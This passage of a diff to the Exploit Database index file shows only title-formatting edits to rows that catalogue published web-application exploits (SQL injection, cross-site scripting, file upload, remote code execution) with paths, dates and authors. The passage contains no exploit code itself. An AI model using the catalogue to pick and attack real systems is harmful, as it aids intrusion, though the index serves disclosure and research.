Injections",2008-12-15,AlpHaNiX,asp,webapps,0 7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 -7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 +7486,platforms/asp/webapps/7486.txt,"Click&Rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps,0 7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps,0 @@ -22029,7 +22032,7 @@ id,file,description,date,author,platform,type,port 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0 -9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0 +9110,platforms/php/webapps/9110.txt,"WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0 @@ -22648,7 +22651,7 @@ id,file,description,date,author,platform,type,port 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0 10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 -10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0 +10502,platforms/asp/webapps/10502.txt,"Pre Hotels&Resorts Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0 10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 @@ -23290,7 +23293,7 @@ id,file,description,date,author,platform,type,port 11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0 11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0 11625,platforms/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0 -11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS - (Survey and Poll) SQL Injection",2010-03-04,SENOT,php,webapps,0 +11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,php,webapps,0 11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 @@ -23686,7 +23689,7 @@ id,file,description,date,author,platform,type,port 12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0 12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 -12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0 +12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)",2010-04-16,EL-KAHINA,php,webapps,0 12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0 @@ -23797,7 +23800,7 @@ id,file,description,date,author,platform,type,port 12444,platforms/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps,0 12445,platforms/php/webapps/12445.txt,"Articles Directory - Authentication Bypass",2010-04-29,Sid3^effects,php,webapps,0 12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0 -12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup",2010-04-29,indoushka,php,webapps,0 +12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup",2010-04-29,indoushka,php,webapps,0 12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload / Cross-Site Scripting",2010-04-29,Sid3^effects,php,webapps,0 12449,platforms/php/webapps/12449.txt,"DZCP (deV!L_z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0 12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - Cross-Site Scripting",2010-04-29,"High-Tech Bridge SA",windows,webapps,0 @@ -24280,7 +24283,7 @@ id,file,description,date,author,platform,type,port 14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0 14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0 14048,platforms/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0 -14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0 +14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0 14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",php,webapps,0 14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0 14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 @@ -26596,7 +26599,7 @@ id,file,description,date,author,platform,type,port 21588,platforms/cgi/webapps/21588.txt,"BlackBoard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 21590,platforms/php/webapps/21590.txt,"phpAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0 21609,platforms/cgi/webapps/21609.txt,"Fluid Dynamics Search Engine 2.0 - Cross-Site Scripting",2002-07-10,VALDEUX,cgi,webapps,0 -21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory And File Content Disclosure",2002-07-11,JWC,php,webapps,0 +21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory and File Content Disclosure",2002-07-11,JWC,php,webapps,0 21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x - Account Hijacking",2002-07-15,"Security Bugware",cgi,webapps,0 21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps,0 21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps,0 @@ -27827,10 +27830,10 @@ id,file,description,date,author,platform,type,port 24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0 24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0 24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0 -24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0 +24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0 24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 -24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 -24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 +24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 +24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0 24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0 24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - SettingsBase.php Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0 @@ -32116,7 +32119,7 @@ id,file,description,date,author,platform,type,port 30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,asp,webapps,0 30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 - usergallery.php galleryID Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0 30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - calendar.php Multiple Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0 -30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0 +30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0 30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0 30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 @@ -32560,7 +32563,7 @@ id,file,description,date,author,platform,type,port 31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - lookup_result.asp domain Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0 31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0 31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0 -31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0 +31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0 31555,platforms/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0 40770,platforms/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps,0 40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0 @@ -34025,7 +34028,7 @@ id,file,description,date,author,platform,type,port 34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 +34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database and Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80 @@ -34268,7 +34271,7 @@ id,file,description,date,author,platform,type,port 34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34538,platforms/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80 -34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0 +34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,php,webapps,0 34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - Parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - idstatusframe.php Multiple Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - survey.php category Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 @@ -34727,7 +34730,7 @@ id,file,description,date,author,platform,type,port 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80 -35238,platforms/multiple/webapps/35238.txt,"Gogs - (users and repos q pararm) SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0 +35238,platforms/multiple/webapps/35238.txt,"Gogs - users and repos q SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0 35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0 35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0 @@ -35089,7 +35092,7 @@ id,file,description,date,author,platform,type,port 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35846,platforms/php/webapps/35846.txt,"WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 -35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0 +35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0 35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0 35853,platforms/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps,0 35854,platforms/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps,0 @@ -35332,7 +35335,7 @@ id,file,description,date,author,platform,type,port 36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0 36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0 -36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 +36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0 @@ -35799,7 +35802,7 @@ id,file,description,date,author,platform,type,port 36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 -36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 +36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 @@ -36085,7 +36088,7 @@ id,file,description,date,author,platform,type,port 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0 37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80 -39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0 +39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0 37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,php,webapps,80 37361,platforms/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 @@ -36126,7 +36129,7 @@ id,file,description,date,author,platform,type,port 37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0 37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0 -37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 +37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 37417,platforms/php/webapps/37417.php,"Multiple WordPress Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37418,platforms/php/webapps/37418.php,"WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37419,platforms/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 @@ -36353,7 +36356,7 @@ id,file,description,date,author,platform,type,port 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0 37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0 37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0 -37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0 +37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0 37773,platforms/php/webapps/37773.txt,"Joomla! Component 'com_memorix' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 37774,platforms/php/webapps/37774.txt,"Joomla! Component 'com_informations' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0 @@ -36403,8 +36406,8 @@ id,file,description,date,author,platform,type,port 37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-19,LiquidWorm,php,webapps,9999 -37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 -37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999 +37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 +37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload and Execute Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343 37892,platforms/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 @@ -37231,7 +37234,7 @@ id,file,description,date,author,platform,type,port 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443 39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent Cross-Site Scripting",2016-03-28,"Sarim Kiani",multiple,webapps,80 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80 -39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0 +39573,platforms/windows/webapps/39573.txt,"Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0 39575,platforms/php/webapps/39575.txt,"WordPress Plugin eBook Download 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 39576,platforms/php/webapps/39576.txt,"WordPress Plugin Import CSV 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 39577,platforms/php/webapps/39577.txt,"WordPress Plugin Abtest - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 @@ -38306,7 +38309,7 @@ id,file,description,date,author,platform,type,port 42064,platforms/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 -42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 +42067,platforms/multiple/webapps/42067.html,"WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42068,platforms/multiple/webapps/42068.html,"WebKit - 